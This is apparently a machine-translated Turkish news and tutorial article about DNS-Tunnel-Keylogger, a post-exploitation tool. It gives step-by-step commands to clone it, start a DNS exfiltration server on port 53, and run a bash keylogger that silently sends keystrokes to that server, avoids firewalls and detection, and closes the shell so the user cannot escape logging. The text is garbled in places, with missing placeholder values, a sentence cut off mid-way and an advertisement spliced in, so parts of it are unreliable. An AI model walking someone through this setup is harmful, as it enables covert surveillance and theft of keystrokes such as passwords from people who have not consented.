Pentester'lar için GitHub'da yeni bir keylogging sunucusu ve istemci aracı yayınlandı. Araç, tuş vuruşlarını güvenlik duvarları üzerinden iletmek için DNS tünellemeyi kullanıyor ve potansiyel olarak tespit edilmekten gizlice kaçıyor.
DNS-Tunnel-Keylogger aracı, sızma testçileri için istismar sonrası faaliyetler için tasarlanmıştır ve güvenlik sistemleri tarafından keşfedilme şansını en aza indirmek için hafif sızma ve kalıcılığı vurgular.
Aracın sunucu bileşeni Python 3'te yazılmıştır ve bağımlılıkların pip aracılığıyla kurulmasını gerektirir.
Varsayılan olarak UDP bağlantı noktası 53'te çalışır, ancak kullanıcılar -p bayrağını kullanarak farklı bir bağlantı noktası belirtebilirler. Sunucunun IP adresi, diğer ad sunucularının sunucuyu bulmasını sağlamak için SOA ve NS kayıtlarında kullanılır.
Kullanıcılara, etki alanlarının ad alanını özel DNS'ye ayarlamaları ve bunu sızıntı sunucusunun IP adresine yönlendirmeleri, böylece birleştirme kayıtlarının etkili bir şekilde ayarlanması talimatı verilir.
DNS tünelleme, DNS sorgularında ve yanıtlarında diğer programların veya protokollerin verilerini kodlamaya yönelik bir tekniktir.
Bu, tespit ve güvenlik duvarı kısıtlamalarından kaçınırken, kullanım sonrası veri çıkarma için özellikle yararlı olabilir.
- DNS ve ağ kavramları bilgisi
- Python ve Bash komut dosyalarına aşinalık
- Keylogger istemcisi için bir Linux ortamı
- Python3 sunucuda yüklü
İstemci tarafında, Linux keylogger iki bash betiğinden oluşur. connection.sh
komut dosyası, yakalanan tuş vuruşlarını sunucuya göndermekten sorumludur; logger.sh
komut dosyası, keylogging işlemini başlatmak için kullanılır.
Keylogger sessizce başlatılabilir ve keylogger olmayan bir duruma dönmeyi önlemek için çıkışta kabuk kapatılabilir.
Trustifi'nin Gelişmiş tehdit koruması, en geniş yelpazedeki karmaşık saldırıları, kullanıcının posta kutusuna ulaşmadan önce önler. Gelişmiş Yapay Zeka Destekli E-posta Koruması ile Trustifi Ücretsiz Tehdit Taramasını deneyin.
Ücretsiz Tehdit Taraması Çalıştırın
Geliştiriciler, keylogger'ın etkileşimli olmayan kabuklarda çalışmayacağını ve Windows'un Dns_Query_A
Sunucu yinelenen paketleri atarak bunu halledecek şekilde tasarlanmış olmasına rağmen, işlev yinelenen istekler gönderme eğilimindedir[[
DNS Tüneli Keylogger – Sunucu Kurulumu
1. Adım: Depoyu Klonlayın
Öncelikle GitHub'dan DNS-Tunnel-Keylogger deposunu kopyalamanız gerekir:
git clone https://github.com/Geeoon/DNS-Tunnel-Keylogger.git
Adım 2: Bağımlılıkları Kurun
Klonlanan dizine gidin ve gerekli Python bağımlılıklarını yükleyin:
cd DNS-Tunnel-Keylogger
python3 -m pip install -r requirements.txt
3. Adım: Sunucuyu Başlatın
Sunucuyu başlatmak için aşağıdaki komutu kullanın:
python3 main.py
Yer değiştirmek
sunucunun IP adresiyle ve
sunucunun yetkili olduğu etki alanıyla.
Sunucu Seçenekleri:
-h, --help
: Yardım mesajını gösterin ve çıkın.-p PORT, --port PORT
: Dinlemek için farklı bir bağlantı noktası belirtin. Varsayılan olarak sunucu UDP bağlantı noktası 53'ü dinler.
İstemci Kurulumu (Linux Keylogger)
Adım 1: Komut Dosyalarını Hazırlayın
Şundan emin olun: logger.sh
Ve connection.sh
aynı dizindedir. Bu komut dosyaları tuş vuruşlarını yakalayacak ve sunucuya gönderecektir.
Adım 2: Keylogger'ı başlatın
Keylogger'ı başlatmak için aşağıdaki komutu yürütün:
./logger.sh && exit
Yer değiştirmek
Verilerin gönderileceği alan adı ile. && exit
Keyloglanmamış bir kabuğa geri dönmeyi önlemek için çıkışta kabuğu kapatacaktır.
Keylogger Seçenekleri:
-p path
: Dinlenecek günlük dosyasının yolunu belirtin. Varsayılan olarak bu/tmp/
.-l
: Günlükçüyü, hata ayıklama için yararlı olabilecek uyarılar ve hatalar yazdırılarak çalıştırın.
Ek Bilgiler
Manuel Veri İletimi
Bir dosya gibi verileri manuel olarak göndermek istiyorsanız, verileri connection.sh
Bağlantı kuracak ve verileri gönderecek komut dosyası.
Güvenlik Hususları
Uygun yetkilendirme olmadan kullanıldığında, keylogger ve DNS tünelleme birçok yargı bölgesinde kötü amaçlı ve yasa dışı olarak kabul edilebilir. Bu araçları ortamınızda kullanabildiğinizden ve ilgili tüm yasalara ve etik yönergelere uyduğunuzdan emin olun.
Sorun giderme
- Sorunla karşılaşırsanız kaldırın
&> /dev/null
hata mesajlarını görüntülemek için keylogger komutundan. - DNS bağlantı noktasının (varsayılan 53) gelen ve giden bağlantılara açık olduğundan emin olmak için sunucunun güvenlik duvarı ayarlarını kontrol edin.
- Lütfen kullanılan etki alanının doğru şekilde yapılandırıldığını ve sunucunun bunun için yetkili olarak ayarlandığını doğrulayın.
Bu kılavuz, gizli tuş vuruşu sızıntısı için DNS tünelleme keylogger'ı kurma adımlarını sağlar. Bu aracı sorumlu bir şekilde ve yasalara uygun olarak kullanmayı unutmayın.
Siber Güvenlik haberleri, Teknik İncelemeler ve İnfografiklerden haberdar olun. Bizi LinkedIn'de takip edin & heyecan.